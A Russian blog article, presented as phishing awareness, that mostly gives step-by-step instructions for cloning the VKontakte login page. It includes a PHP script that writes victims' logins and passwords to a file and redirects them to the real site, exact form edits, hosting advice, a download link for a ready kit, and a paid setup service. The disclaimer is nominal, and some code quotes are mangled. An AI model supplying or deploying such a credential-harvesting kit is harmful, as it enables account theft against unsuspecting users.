Как не попасться на фишинговый сайт?

В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.

Что такое фишинг?

Вообще слово fishing переводится как рыбалка. Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.

Будьте внимательными

Как вам могут подсунуть такой сайт, есть пару примеров.

1. На любом ресурсе может быть ссылка, в которой говорится: “добавь меня в друзья и получи за это 10 голосов вконтакте”. Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
2. Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)

И еще куча вариантов, как можно заманить жертву на такой вот сайт.

Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.

Создание фишинг сайта

Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.

И так приведу пример создания фишингового сайта для социальной сети вконтакте.

Открываем любой браузер, заходим по адресу vk.com,

жмем файл => сохранить как =>

Имя файла: index.html

Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.

Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php

Открываем блокнот и вставляем туда этот код.

<?

$Login = $_POST[‘zabor’]; // Логин  жертвы

$Pass = $_POST[‘zena’]; // Пароль жертвы

$log = fopen(‘ups.php’,’a+’); //тут будут лежать пароли жертв

fwrite($log,'<br> $Login:$Pass \n’); //производим запись в ups.php

fclose($log); //закрывает ups.php

echo ‘<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>’; // перенаправляем жертву на http://vk.com

?>

Закрываем и сохраняем как icq.php

Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.

Он найдет строчку:

<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”https://login.vk.com/?act=login” method=”POST”>

Меняем её на это:

<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”icq.php” method=”POST”>

Дальше, смотрим чуть ниже и находим строчку:

<INPUT name=”email” id=”quick_email” onfocus=”show’quick_expire’)” type=”text”>

Меняем на это:

<INPUT name=”zabor” id=”quick_email” onfocus=”show(‘quick_expire’)”type=”text”>

Смотрим еще чуть ниже и находим строчку:

<INPUT name=”pass” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>

Меняем на это:

<INPUT name=”zena” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>

Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.

<DIV class=”button_blue button_wide”><BUTTON id=”quick_login_button”>Войти</BUTTON></form></DIV>

Сохраняем index.html, и у вас в итоге получилось два файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц,  всего 150 рублей. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.

Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создаться на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.

Рассказ о том как залить все это дело на хостинг

Вывод

В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей.

Скачать готовый фишинговый сайт для вконтакте.

Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе: https://vk.com/27sysday

1. Вышла новая статья про фишинг в одноклассниках.
2. Вышла новая статья про фишинг в инстаграм.

В связи с большим количеством обращений, решил создать услугу по настройке.

Что понадобится

1. Вам нужно зарегистрироваться https://beget.com
2. Связать со мной в скайпе spbskull.
3. Сказать мне логин и пароль.
4. Пополнить баланс телефона на 1500 рублей (тел. скажу в скайпе).
5. Через час после оплаты, получите готовое решение.